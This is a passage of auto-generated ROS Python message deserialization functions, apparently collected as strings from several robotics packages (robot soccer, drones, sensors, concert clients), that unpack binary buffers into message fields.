self.oppinfo is None:\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n if self.robotinfo is None:\n self.robotinfo = None\n if self.ballinfo is None:\n self.ballinfo = None\n if self.coachinfo is None:\n self.coachinfo = nubot_common.msg.CoachInfo()\n if self.pass_cmd is None:\n self.pass_cmd = nubot_common.msg.PassCommands()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.obstacleinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.obstacleinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.polar_pos.append(val1)\n _x = self\n start = end\n end += 12\n (_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.oppinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.oppinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.polar_pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.robotinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.RobotInfo()\n _v34 = val1.header\n start = end\n end += 4\n (_v34.seq,) = _get_struct_I().unpack(str[start:end])\n _v35 = _v34.stamp\n _x = _v35\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v34.frame_id = str[start:end].decode('utf-8')\n else:\n _v34.frame_id = str[start:end]\n _x = val1\n start = end\n end += 28\n (_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum,) = _get_struct_7i().unpack(str[start:end])\n _v36 = val1.pos\n _x = _v36\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v37 = val1.heading\n start = end\n end += 4\n (_v37.theta,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (val1.vrot,) = _get_struct_f().unpack(str[start:end])\n _v38 = val1.vtrans\n _x = _v38\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 9\n (_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time,) = _get_struct_5Bf().unpack(str[start:end])\n val1.iskick = bool(val1.iskick)\n val1.isvalid = bool(val1.isvalid)\n val1.isstuck = bool(val1.isstuck)\n val1.isdribble = bool(val1.isdribble)\n _v39 = val1.target\n _x = _v39\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.robotinfo.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.ballinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.BallInfo()\n _v40 = val1.header\n start = end\n end += 4\n (_v40.seq,) = _get_struct_I().unpack(str[start:end])\n _v41 = _v40.stamp\n _x = _v41\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v40.frame_id = str[start:end].decode('utf-8')\n else:\n _v40.frame_id = str[start:end]\n start = end\n end += 4\n (val1.ballinfostate,) = _get_struct_i().unpack(str[start:end])\n _v42 = val1.pos\n _x = _v42\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v43 = val1.real_pos\n _x = _v43\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n _v44 = val1.velocity\n _x = _v44\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 2\n (_x.pos_known, _x.velocity_known,) = _get_struct_2B().unpack(str[start:end])\n val1.pos_known = bool(val1.pos_known)\n val1.velocity_known = bool(val1.velocity_known)\n self.ballinfo.append(val1)\n _x = self\n start = end\n end += 12\n (_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.coachinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.coachinfo.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 54\n (_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid,) = _get_struct_3B4f2h3B2I4f4B().unpack(str[start:end])\n self.pass_cmd.is_passout = bool(self.pass_cmd.is_passout)\n self.pass_cmd.is_dynamic_pass = bool(self.pass_cmd.is_dynamic_pass)\n self.pass_cmd.is_static_pass = bool(self.pass_cmd.is_static_pass)\n self.pass_cmd.is_valid = bool(self.pass_cmd.is_valid)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 2580\n self.Rscanpose = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=645)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.home is None:\n self.home = flyaq.msg.Coordinate()\n if self.movements is None:\n self.movements = None\n if self.move_transitions is None:\n self.move_transitions = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.type_name = str[start:end].decode('utf-8')\n else:\n self.type_name = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.home.latitude, _x.home.longitude, _x.home.altitude, _x.home.heading,) = _struct_4f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.movements = []\n for i in range(0, length):\n val1 = flyaq.msg.Move()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 1\n (val1.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.pre_actions = []\n for i in range(0, length):\n val2 = flyaq.msg.Action()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 1\n (val2.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.action_name = str[start:end].decode('utf-8')\n else:\n val2.action_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.parameters = []\n for i in range(0, length):\n val3 = flyaq.msg.Parameter()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.parameters.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.slot_name = str[start:end].decode('utf-8')\n else:\n val2.slot_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.receivers_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.receivers_name.append(val3)\n val1.pre_actions.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.post_actions = []\n for i in range(0, length):\n val2 = flyaq.msg.Action()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 1\n (val2.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.action_name = str[start:end].decode('utf-8')\n else:\n val2.action_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.parameters = []\n for i in range(0, length):\n val3 = flyaq.msg.Parameter()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.parameters.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.slot_name = str[start:end].decode('utf-8')\n else:\n val2.slot_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.receivers_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.receivers_name.append(val3)\n val1.post_actions.append(val2)\n start = end\n end += 4\n (val1.altitude,) = _struct_f.unpack(str[start:end])\n _v7 = val1.target_position\n _x = _v7\n start = end\n end += 16\n (_x.latitude, _x.longitude, _x.altitude, _x.heading,) = _struct_4f.unpack(str[start:end])\n start = end\n end += 1\n (val1.strategy,) = _struct_b.unpack(str[start:end])\n _v8 = val1.duration\n _x = _v8\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2i.unpack(str[start:end])\n _x = val1\n start = end\n end += 13\n (_x.radius, _x.circle_altitude, _x.clockwise, _x.direction,) = _struct_2fBf.unpack(str[start:end])\n val1.clockwise = bool(val1.clockwise)\n self.movements.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.move_transitions = []\n for i in range(0, length):\n val1 = flyaq.msg.MoveTransition()\n start = end\n end += 1\n (val1.is_choice,) = _struct_B.unpack(str[start:end])\n val1.is_choice = bool(val1.is_choice)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.wait_for_slot_name = str[start:end].decode('utf-8')\n else:\n val1.wait_for_slot_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.from_move_name = str[start:end].decode('utf-8')\n else:\n val1.from_move_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.to_move_name = str[start:end].decode('utf-8')\n else:\n val1.to_move_name = str[start:end]\n start = end\n end += 1\n (val1.fluid,) = _struct_B.unpack(str[start:end])\n val1.fluid = bool(val1.fluid)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.condition_identifier = str[start:end].decode('utf-8')\n else:\n val1.condition_identifier = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.false_branch_move_name = str[start:end].decode('utf-8')\n else:\n val1.false_branch_move_name = str[start:end]\n self.move_transitions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.slot_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.slot_names.append(val1)\n start = end\n end += 1\n (self.travel_mode,) = _struct_b.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 41\n (_x.enable_steering, _x.enable_braking, _x.enable_driving, _x.enable_Estop, _x.enable_gear, _x.sw_deg, _x.sw_rad, _x.speed_ms, _x.speed_kms, _x.ax_ms2, _x.omega_rad, _x.gear_mode, _x.steering, _x.speed,) = _get_struct_5B6fi2f().unpack(str[start:end])\n self.enable_steering = bool(self.enable_steering)\n self.enable_braking = bool(self.enable_braking)\n self.enable_driving = bool(self.enable_driving)\n self.enable_Estop = bool(self.enable_Estop)\n self.enable_gear = bool(self.enable_gear)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.sensor_pose_on_robot is None:\n self.sensor_pose_on_robot = geometry_msgs.msg.Pose()\n if self.sensed_data is None:\n self.sensed_data = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 96\n (_x.sensor_pose_on_robot.position.x, _x.sensor_pose_on_robot.position.y, _x.sensor_pose_on_robot.position.z, _x.sensor_pose_on_robot.orientation.x, _x.sensor_pose_on_robot.orientation.y, _x.sensor_pose_on_robot.orientation.z, _x.sensor_pose_on_robot.orientation.w, _x.min_sensor_distance, _x.max_sensor_distance, _x.sensor_std_range, _x.sensor_std_yaw, _x.sensor_std_pitch,) = _get_struct_12d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sensed_data = []\n for i in range(0, length):\n val1 = mrpt_msgs.msg.SingleRangeBearingObservation()\n _x = val1\n start = end\n end += 28\n (_x.range, _x.yaw, _x.pitch, _x.id,) = _get_struct_3di().unpack(str[start:end])\n self.sensed_data.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.Front_sens is None:\n self.Front_sens = motor_sc.msg.sens9ax()\n if self.Rear_sens is None:\n self.Rear_sens = motor_sc.msg.sens9ax()\n end = 0\n _x = self\n start = end\n end += 9\n (_x.Front_sens.ID, _x.Front_sens.timestamp,) = _get_struct_BQ().unpack(str[start:end])\n start = end\n end += 24\n self.Front_sens.compass = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Front_sens.gyro = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Front_sens.accel = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Front_sens.fusionPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 32\n self.Front_sens.fusionQPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)\n _x = self\n start = end\n end += 9\n (_x.Rear_sens.ID, _x.Rear_sens.timestamp,) = _get_struct_BQ().unpack(str[start:end])\n start = end\n end += 24\n self.Rear_sens.compass = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Rear_sens.gyro = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Rear_sens.accel = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Rear_sens.fusionPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 32\n self.Rear_sens.fusionQPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.cnt is None:\n self.cnt = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cnt = []\n for i in range(0, length):\n val1 = dgvmsg.msg.Encounter()\n _v10 = val1.header\n start = end\n end += 4\n (_v10.seq,) = _get_struct_I().unpack(str[start:end])\n _v11 = _v10.stamp\n _x = _v11\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v10.frame_id = str[start:end].decode('utf-8')\n else:\n _v10.frame_id = str[start:end]\n start = end\n end += 4\n (val1.devadd,) = _get_struct_i().unpack(str[start:end])\n _v12 = val1.now\n _x = _v12\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (val1.encounter,) = _get_struct_I().unpack(str[start:end])\n self.cnt.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.group = str[start:end].decode('utf-8')\n else:\n self.group = str[start:end]\n _x = self\n start = end\n end += 2\n (_x.rand_start, _x.current_start,) = _get_struct_2B().unpack(str[start:end])\n self.rand_start = bool(self.rand_start)\n self.current_start = bool(self.current_start)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.start_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 1\n (self.rand_target,) = _get_struct_B().unpack(str[start:end])\n self.rand_target = bool(self.rand_target)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.target_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n _x = self\n start = end\n end += 4\n (_x.execute, _x.wait, _x.ret_plan, _x.ret_fps,) = _get_struct_3Bb().unpack(str[start:end])\n self.execute = bool(self.execute)\n self.wait = bool(self.wait)\n self.ret_plan = bool(self.ret_plan)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.pending is None:\n self.pending = None\n if self.available is None:\n self.available = None\n if self.missing is None:\n self.missing = None\n if self.gone is None:\n self.gone = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pending = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v49 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.name = str[start:end].decode('utf-8')\n else:\n _v49.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v49.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.description = str[start:end].decode('utf-8')\n else:\n _v49.description = str[start:end]\n _v50 = _v49.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v50.resource_name = str[start:end].decode('utf-8')\n else:\n _v50.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v50.format = str[start:end].decode('utf-8')\n else:\n _v50.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v50.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.version = str[start:end].decode('utf-8')\n else:\n _v49.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v51 = val1.conn_stats\n _x = _v51\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v51.gateway_available = bool(_v51.gateway_available)\n _v51.network_info_available = bool(_v51.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v52 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v52.resource_name = str[start:end].decode('utf-8')\n else:\n _v52.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v52.format = str[start:end].decode('utf-8')\n else:\n _v52.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v52.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.pending.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.available = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v53 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.name = str[start:end].decode('utf-8')\n else:\n _v53.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v53.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.description = str[start:end].decode('utf-8')\n else:\n _v53.description = str[start:end]\n _v54 = _v53.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v54.resource_name = str[start:end].decode('utf-8')\n else:\n _v54.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v54.format = str[start:end].decode('utf-8')\n else:\n _v54.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v54.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.version = str[start:end].decode('utf-8')\n else:\n _v53.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v55 = val1.conn_stats\n _x = _v55\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v55.gateway_available = bool(_v55.gateway_available)\n _v55.network_info_available = bool(_v55.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = 